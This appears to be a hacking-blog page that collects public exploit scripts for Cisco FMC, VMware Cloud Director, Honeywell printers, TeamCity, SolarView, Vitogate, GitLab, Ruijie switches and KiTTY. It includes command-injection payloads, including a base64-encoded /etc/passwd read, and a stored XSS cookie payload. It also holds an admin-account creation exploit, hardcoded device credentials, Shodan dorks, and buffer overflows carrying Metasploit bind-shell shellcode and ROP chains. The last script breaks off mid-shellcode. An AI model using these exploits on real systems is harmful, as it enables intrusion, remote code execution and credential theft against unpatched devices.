# Exploit Title: [Cisco Firepower Management Center]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [6.2.3.18", "6.4.0.16", "6.6.7.1]
# CVE : [CVE-2023-20048]
import requests
import json
# set the variables for the URL, username, and password for the FMC web services interface
fmc_url = "https://fmc.example.com"
fmc_user = "admin"
fmc_pass = "cisco123"
# create a requests session to handle cookies and certificate verification
session = requests.Session()
session.verify = False
# send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token
token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken"
response = session.post(token_url, auth=(fmc_user, fmc_pass))
# check the response status and extract the access token and refresh token from the response headers
# set the access token as the authorization header for the subsequent requests
try:
if response.status_code == 200:
access_token = response.headers["X-auth-access-token"]
refresh_token = response.headers["X-auth-refresh-token"]
session.headers["Authorization"] = access_token
else:
print("Failed to get tokens, status code: " + str(response.status_code))
exit()
except Exception as e:
print(e)
exit()
# set the variable for the domain id
# change this to your domain id
domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f"
# send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC
devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords"
response = session.get(devices_url)
# check the response status and extract the data as a json object
try:
if response.status_code == 200:
data = response.json()
else:
print("Failed to get devices, status code: " + str(response.status_code))
exit()
except Exception as e:
print(e)
exit()
# parse the data to get the list of device names and URLs
devices = []
for item in data["items"]:
device_name = item["name"]
device_url = item["links"]["self"]
devices.append((device_name, device_url))
# loop through the list of devices and send a GET request to the URL of each device to get the device details
for device in devices:
device_name, device_url = device
response = session.get(device_url)
# check the response status and extract the data as a json object
try:
if response.status_code == 200:
data = response.json()
else:
print("Failed to get device details, status code: " + str(response.status_code))
continue
except Exception as e:
print(e)
continue
# parse the data to get the device type, software version, and configuration URL
device_type = data["type"]
device_version = data["metadata"]["softwareVersion"]
config_url = data["metadata"]["configURL"]
# check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability
# use the values from the affected products section in the security advisory
if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]:
print("Device " + device_name + " is vulnerable to CVE-2023-20048")
# create a list of commands that you want to execute on the device
commands = ["show version", "show running-config", "show interfaces"]
device_id = device_url.split("/")[-1]
# loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device
# replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute
for command in commands:
command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command
response = session.post(command_url)
# check the response status and extract the data as a json object
try:
if response.status_code == 200:
data = response.json()
else:
print("Failed to execute command, status code: " + str(response.status_code))
continue
except Exception as e:
print(e)
continue
# parse the data to get the result of the command execution and print it
result = data["result"]
print("Command: " + command)
print("Result: " + result)
else:
print("Device " + device_name + " is not vulnerable to CVE-2023-20048")
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863100423
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: [VMware Cloud Director | Bypass identity verification]
# Google Dork: [non]
# Date: [12/06/2023]
# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)
# Version: [10.5]
# CVE : [CVE-2023-34060]
import requests
import paramiko
import subprocess
import socket
import argparse
import threading
# Define a function to check if a port is open
def is_port_open(ip, port):
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Set the timeout to 1 second
s.settimeout(1)
# Try to connect to the port
try:
s.connect((ip, port))
# The port is open
return True
except:
# The port is closed
return False
finally:
# Close the socket
s.close()
# Define a function to exploit a vulnerable device
def exploit_device(ip, port, username, password, command):
# Create a ssh client object
client = paramiko.SSHClient()
# Set the policy to accept any host key
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Connect to the target using the credentials
client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)
# Execute the command and get the output
stdin, stdout, stderr = client.exec_command(command)
# Print the output
print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")
# Close the ssh connection
client.close()
# Parse the arguments from the user
parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")
parser.add_argument("ip", help="The target IP address")
parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")
parser.add_argument("-u", "--username", default="root", help="The username for ssh")
parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")
parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")
args = parser.parse_args()
# Loop through the ports and check for the vulnerability
for port in args.ports:
# Check if the port is open
if is_port_open(args.ip, port):
# The port is open, send a GET request to the port and check the status code
response = requests.get(f"http://{args.ip}:{port}")
if response.status_code == 200:
# The port is open and vulnerable
print(f"Port {port} is vulnerable to CVE-2023-34060")
# Create a thread to exploit the device
thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))
# Start the thread
thread.start()
else:
# The port is open but not vulnerable
print(f"Port {port} is not vulnerable to CVE-2023-34060")
else:
# The port is closed
print(f"Port {port} is closed")
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710
import requests
import argparse
BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'
def banner():
banner = """
╔════════════════════════════════════════════════╗
CVE-2023-3710
Command Injection in Honeywell PM43 Printers
Author: ByteHunter
╚════════════════════════════════════════════════╝
"""
print(YELLOW + banner + RESET)
def run_command(url, command):
full_url = f"{url}/loadfile.lp?pageid=Configure"
payload = {
'username': f'hunt\n{command}\n',
'userpassword': 'admin12345admin!!'
}
try:
response = requests.post(full_url, data=payload, verify=False)
response_text = response.text
html_start_index = response_text.find('<html>')
if html_start_index != -1:
return response_text[:html_start_index]
else:
return response_text
except requests.exceptions.RequestException as e:
return f"Error: {e}"
def main():
parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
parser.add_argument('--url', dest='url', help='Target URL', required=True)
parser.add_argument('--run', dest='command', help='Command to execute', required=True)
args = parser.parse_args()
response = run_command(args.url, args.command)
print(f"{BLUE}{response}{RESET}")
if __name__ == "__main__":
banner()
main()
Exploit Title: SnipeIT 6.2.1 - Stored Cross Site Scripting
Date: 06-Oct-2023
Exploit Author: Shahzaib Ali Khan
Vendor Homepage: https://snipeitapp.com
Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
Version: 6.2.1
Tested on: Windows 11 22H2 and Ubuntu 20.04
CVE: CVE-2023-5452
Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting
(XSS) feature that allows attackers to execute JavaScript commands. The
location endpoint was vulnerable.
Steps to Reproduce:
1. Login as a standard user [non-admin] > Asset page > List All
2. Click to open any asset > Edit Asset
3. Create new location and add the payload:
<script>alert(document.cookie)</script>
4. Now login to any other non-admin or admin > Asset page > List All
5. Open the same asset of which you can change the location and the payload
will get executed.
POC Request:
POST /api/v1/locations HTTP/1.1
Host: localhost
Content-Length: 118
Accept: */*
X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGV
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/hardware/196/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;
assetsListingTable.bs.table.cardView=false; laravel_token=
eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3
ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNM
d2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa0
01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
XSRF-TOKEN=
eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bH
FWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5
MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3D
Connection: close
name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=
Thanks,
Shahzaib Ali Khan
#- Exploit Title: JetBrains TeamCity 2023.05.3 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:TeamCity , http.favicon.hash:-1944119648
#- Exploit Author: ByteHunter
#- Vendor: JetBrains
#- Email: 0xByteHunter@proton.me
#- vendor: JetBrains
#- Version: versions before 2023.05.4
#- Tested on: 2023.05.3
#- CVE : CVE-2023-42793
import requests
import argparse
import re
import random
import string
import subprocess
banner = """
=====================================================
* CVE-2023-42793 *
* TeamCity Admin Account Creation *
* *
* Author: ByteHunter *
=====================================================
"""
print(banner)
parser = argparse.ArgumentParser(description="CVE-2023-42793 - TeamCity JetBrains PoC")
parser.add_argument("-u", "--url", required=True, help="Target URL")
parser.add_argument("-v", "--verbose", action="store_true", help="verbose mode")
args = parser.parse_args()
url = args.url
if url.startswith("https://"):
curl_command = "curl -k"
else:
curl_command = "curl"
get_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"
delete_token_url = f"{url}/app/rest/users/id:1/tokens/RPC2"
create_user_url = f"{url}/app/rest/users"
create_user_command = ""
token = ""
response = requests.post(get_token_url, verify=False)
if response.status_code == 200:
match = re.search(r'value="([^"]+)"', response.text)
if match:
token = match.group(1)
print(f"Token: {token}")
else:
print("Token not found in the response")
elif response.status_code == 404:
print("Token already exists")
delete_command = f'{curl_command} -X DELETE {delete_token_url}'
delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
delete_process.wait()
delete_output = delete_process.communicate()
if delete_process.returncode == 0:
print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")
else:
print("Failed to delete the previous token")
elif response.status_code == 400:
print("Token already exists")
delete_command = f'{curl_command} -X DELETE {delete_token_url}'
delete_process = subprocess.Popen(delete_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
delete_process.wait()
delete_output = delete_process.communicate()
if delete_process.returncode == 0:
print("Previous token deleted successfully\nrun this command again for creating new token & admin user.")
else:
print("Failed to delete the previous token")
else:
print("Failed to get a token")
if token:
headers = {
"Authorization": f"Bearer {token}",
"Content-Type": "application/json"
}
random_chars = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(4))
username = f"city_admin{random_chars}"
data = {
"username": username,
"password": "Main_password!!**",
"email": "angry-admin@funnybunny.org",
"roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}
}
create_user_command = f'{curl_command} --path-as-is -H "Authorization: Bearer {token}" -X POST {create_user_url} -H "Content-Type: application/json" --data \'{{"username": "{username}", "password": "theSecretPass!", "email": "nest@nest", "roles": {{"role": [{{"roleId": "SYSTEM_ADMIN", "scope": "g"}}]}}}}\''
create_user_response = requests.post(create_user_url, headers=headers, json=data)
if create_user_response.status_code == 200:
print("Successfully exploited!")
print(f"URL: {url}")
print(f"Username: {username}")
print("Password: Main_password!!**")
else:
print("Failed to create new admin user")
if args.verbose:
if response.status_code == 400:
pass
else:
print(f"Final curl command: {create_user_command}")
#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333
import argparse
import requests
def vuln_check(ip_address, port):
url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
response = requests.get(url)
if response.status_code == 200:
output = response.text
if "root" in output:
print("Vulnerability detected: Command Injection possible.")
print(f"passwd file content:\n{response.text}")
else:
print("No vulnerability detected.")
else:
print("Error: Unable to fetch response.")
def main():
parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
args = parser.parse_args()
ip_address = args.ip
port = args.port
vuln_check(ip_address, port)
if __name__ == "__main__":
main()
#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:'Vitogate 300'
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: versions up to 2.1.3.0
#- Tested on: 2.1.1.0
#- CVE : CVE-2023-5702 & CVE-2023-5222
import argparse
import requests
def banner():
banner = """
╔═══════════════════════════════════╗
CVE-2023-5702
Vitogate 300 RCE
Author: ByteHunter
╚═══════════════════════════════════╝
"""
print(banner)
def send_post_request(target_ip, command, target_port):
payload = {
"method": "put",
"form": "form-4-7",
"session": "",
"params": {
"ipaddr": f"1;{command}"
}
}
headers = {
"Host": target_ip,
"Content-Length": str(len(str(payload))),
"Content-Type": "application/json"
}
url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"
response = requests.post(url, json=payload, headers=headers)
if response.status_code == 200:
print("Result:")
print(response.text)
else:
print(f"Request failed! status code: {response.status_code}")
def main():
parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
parser.add_argument("--target", required=False, help="Target IP address")
parser.add_argument("--port", required=False, help="Target port",default="80")
parser.add_argument("--command", required=False, help="Command")
parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")
args = parser.parse_args()
if args.creds:
print("Vitogate 300 hardcoded administrative accounts credentials")
print("Username: vitomaster, Password: viessmann1917")
print("Username: vitogate, Password: viessmann")
else:
target_ip = args.target
target_port = args.port
command = args.command
if not (target_ip and command):
print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
return
send_post_request(target_ip, command,target_port)
if __name__ == "__main__":
banner()
main()
# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset
# Exploit Author: Sebastian Kriesten (0xB455)
# Twitter: https://twitter.com/0xB455
# Date: 2024-01-12
# Vendor Homepage: gitlab.com
# Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
# Version: <16.7.2, <16.6.4, <16.5.6
# CVE: CVE-2023-7028
Proof of Concept:
user[email][]=valid@email.com&user[email][]=attacker@email.com
# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: 2024-25003
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(windows/shell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
import sys
import os
import struct
#---------------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py #
# windows/shell_bind_tcp - 375 bytes #
# https://metasploit.com/ #
# Encoder: x86/xor_poly #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
# AutoVerifySession=true #
#---------------------------------------------------------------------------------------------#
buf = b""
buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41"
buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff"
buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc"
buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28"
buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f"
buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb"
buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4"
buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4"
buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85"
buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f"
buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13"
buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30"
buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c"
buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0"
buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f"
buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7"
buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44"
buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4"
buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84"
buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5"
buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3"
buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc"
buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99"
buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83"
buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90"
buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80"
buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc"
buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b"
buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76"
buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde"
buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4"
buf += b"\xf2\x3b\x21"
def shellcode():
sc = b''
sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444
sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444
sc += b'\x29\xD8' # sub eax,ebx
sc += b'\x29\xC4' # sub esp,eax
sc += buf
sc += b'\x90' * (1052-len(sc))
assert len(sc) == 1052
return sc
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
#[---INFO:gadgets_to_set_esi:---]
0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe]
0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe]
0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe]
#[---INFO:gadgets_to_set_ebp:---]
0x00429953, # POP EBP # RETN [kitty.exe]
0x005405b0, # push esp; ret 0 [kitty.exe]
#[---INFO:gadgets_to_set_ebx:---]
0x0049d9f9, # POP EBX # RETN [kitty.exe]
0x00000201, # 0x00000201-> ebx
#[---INFO:gadgets_to_set_edx:---]
0x00430dce, # POP EDX # RETN [kitty.exe]
0x00000040, # 0x00000040-> edx
#[---INFO:gadgets_to_set_ecx:---]
0x005ac58c, # POP ECX # RETN [kitty.exe]
0x004d81d9, # &Writable location [kitty.exe]
#[---INFO:gadgets_to_set_edi:---]
0x004fa404, # POP EDI # RETN [kitty.exe]
0x005a2001, # RETN (ROP NOP) [kitty.exe]
#[---INFO:gadgets_to_set_eax:---]
0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe]
0x90909090, # nop
0x41414141, # Filler (compensate)
#[---INFO:pushad:---]
0x005dfbac, # PUSHAD # RETN [kitty.exe]
]
return b''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#----------------------------------------------------------------------------------#
# Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40 #
# Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : #
# ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN #
# ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} #
# Shellcode size at ESP: 1052 #
#----------------------------------------------------------------------------------#
return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE}
rop_chain_padding = b'\x90' * 35
nops = b'\x90' * 88
escape_sequence = b'\033]0;__dt:' + shellcode() + return_address
escape_sequence += rop_chain_padding + rop_chain
escape_sequence += b'\x90'
escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490
escape_sequence += nops + b'\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE)
#- Shodan Dork: http.html_hash:-1402735717
#- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: PSG-5124(LINK SOFTWARE RELEASE:26293)
#- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293)
import http.client
import argparse
def send_request(ip, port, command):
headers = {
"Host": f"{ip}:{port}",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"DNT": "1",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Cmdnum": "1",
"Confirm1": "n",
"Content-Length": "0",
"Command1": command
}
try:
connection = http.client.HTTPConnection(f"{ip}:{port}")
connection.request("GET", "/EXCU_SHELL", headers=headers)
response = connection.getresponse()
print(f"Status Code: {response.status}")
print(response.read().decode('utf-8'))
connection.close()
except Exception as e:
print(f"Request failed: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE')
parser.add_argument('--ip', help='Target IP address', required=True)
parser.add_argument('--port', help='Port', required=True)
parser.add_argument('--cmd', help='Command', required=True)
args = parser.parse_args()
ip = args.ip
port = args.port
command = args.cmd
send_request(ip, port, command)
# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Username' Buffer Overflow
# Exploit Author: DEFCESCO (Austin A. DeFrancesco)
# Vendor Homepage: https://github.com/cyd01/KiTTY/=
# Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip
# Version: ≤ 0.76.1.13
# Tested on: Microsoft Windows 11/10/8/7/XP
# CVE: CVE-2024-25004
#-------------------------------------------------------------------------------------#
# Blog: https://blog.DEFCESCO.io/Hell0+KiTTY
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > to_handler #
# [*] Payload Handler Started as Job 1 #
# msf6 payload(windows/shell_bind_tcp) > #
# [*] Started bind TCP handler against 192.168.100.28:4444 #
# [*] Command shell session 1 opened (192.168.100.119:34285 -> 192.168.100.28:4444) #
#-------------------------------------------------------------------------------------#
import sys
import os
import struct
#-------------------------------------------------------------------------------------#
# msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c' -f py #
# windows/shell_bind_tcp - 355 bytes #
# https://metasploit.com/ #
# Encoder: x86/shikata_ga_nai #
# VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, #
# PrependMigrate=false, EXITFUNC=process, CreateSession=true, #
# AutoVerifySession=true #
#-------------------------------------------------------------------------------------#
buf = b""
buf += b"\xd9\xe9\xd9\x74\x24\xf4\xbd\xfe\xb7\xa4\x99\x5e"
buf += b"\x29\xc9\xb1\x53\x83\xee\xfc\x31\x6e\x13\x03\x90"
buf += b"\xa4\x46\x6c\x90\x23\x04\x8f\x68\xb4\x69\x19\x8d"
buf += b"\x85\xa9\x7d\xc6\xb6\x19\xf5\x8a\x3a\xd1\x5b\x3e"
buf += b"\xc8\x97\x73\x31\x79\x1d\xa2\x7c\x7a\x0e\x96\x1f"
buf += b"\xf8\x4d\xcb\xff\xc1\x9d\x1e\xfe\x06\xc3\xd3\x52"
buf += b"\xde\x8f\x46\x42\x6b\xc5\x5a\xe9\x27\xcb\xda\x0e"
buf += b"\xff\xea\xcb\x81\x8b\xb4\xcb\x20\x5f\xcd\x45\x3a"
buf += b"\xbc\xe8\x1c\xb1\x76\x86\x9e\x13\x47\x67\x0c\x5a"
buf += b"\x67\x9a\x4c\x9b\x40\x45\x3b\xd5\xb2\xf8\x3c\x22"
buf += b"\xc8\x26\xc8\xb0\x6a\xac\x6a\x1c\x8a\x61\xec\xd7"
buf += b"\x80\xce\x7a\xbf\x84\xd1\xaf\xb4\xb1\x5a\x4e\x1a"
buf += b"\x30\x18\x75\xbe\x18\xfa\x14\xe7\xc4\xad\x29\xf7"
buf += b"\xa6\x12\x8c\x7c\x4a\x46\xbd\xdf\x03\xab\x8c\xdf"
buf += b"\xd3\xa3\x87\xac\xe1\x6c\x3c\x3a\x4a\xe4\x9a\xbd"
buf += b"\xad\xdf\x5b\x51\x50\xe0\x9b\x78\x97\xb4\xcb\x12"
buf += b"\x3e\xb5\x87\xe2\xbf\x60\x3d\xea\x66\xdb\x20\x17"
buf += b"\xd8\x8b\xe4\xb7\xb1\xc1\xea\xe8\xa2\xe9\x20\x81"
buf += b"\x4b\x14\xcb\xbc\xd7\x91\x2d\xd4\xf7\xf7\xe6\x40"
buf += b"\x3a\x2c\x3f\xf7\x45\x06\x17\x9f\x0e\x40\xa0\xa0"
buf += b"\x8e\x46\x86\x36\x05\x85\x12\x27\x1a\x80\x32\x30"
buf += b"\x8d\x5e\xd3\x73\x2f\x5e\xfe\xe3\xcc\xcd\x65\xf3"
buf += b"\x9b\xed\x31\xa4\xcc\xc0\x4b\x20\xe1\x7b\xe2\x56"
buf += b"\xf8\x1a\xcd\xd2\x27\xdf\xd0\xdb\xaa\x5b\xf7\xcb"
buf += b"\x72\x63\xb3\xbf\x2a\x32\x6d\x69\x8d\xec\xdf\xc3"
buf += b"\x47\x42\xb6\x83\x1e\xa8\x09\xd5\x1e\xe5\xff\x39"
buf += b"\xae\x50\x46\x46\x1f\x35\x4e\x3f\x7d\xa5\xb1\xea"
